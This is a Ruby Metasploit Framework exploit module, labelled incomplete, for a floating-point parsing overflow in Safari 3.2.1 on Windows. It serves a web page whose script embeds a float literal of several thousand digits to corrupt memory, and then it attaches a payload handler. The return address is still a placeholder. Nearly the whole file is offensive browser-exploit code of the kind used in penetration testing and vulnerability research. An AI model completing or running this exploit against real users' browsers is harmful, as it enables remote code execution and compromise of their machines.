##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class MetasploitModule < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	#include Msf::Exploit::Remote::BrowserAutopwn
	#autopwn_info({
	#	:ua_name    => HttpClients::SAFARI,
	#	:javascript => true,
	#	:rank       => NormalRanking, # reliable memory corruption
	#	:vuln_test  => nil,
	#})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Safari Floating Point Number Parsing Overflow',
			'Description'    => %q{ },
			'License'        => BSD_LICENSE,
			'Author'         => [ 'egypt' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					 #['BID', ''],
					 #['CVE', ''],
				],
			'Platform' => [ 'win' ],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows Safari 3.2.1 via libxml2.dll',
						{
							'Ret'      => 0xdeadbeef,  # call eax; libxml2.dll
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		p = regenerate_payload(cli)
		if (p == nil)
			send_not_found(cli)
			return
		end

		headers = {
			'Cache-control' => 'must-revalidate',
			'Expires' => '0'
		}
		case request.uri
		when get_resource()
			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

			num = "1"*3658
			content = "<html><head></head><body>"
			content << "<script><!--\n"
			content << "var Overflow = \"31337\" + 0.#{num};\n"
			content << "//--></script>"
			content << "</body></html>"
		end
		send_response(cli, content, headers)

		# Handle the payload
		handler(cli)

	end

end
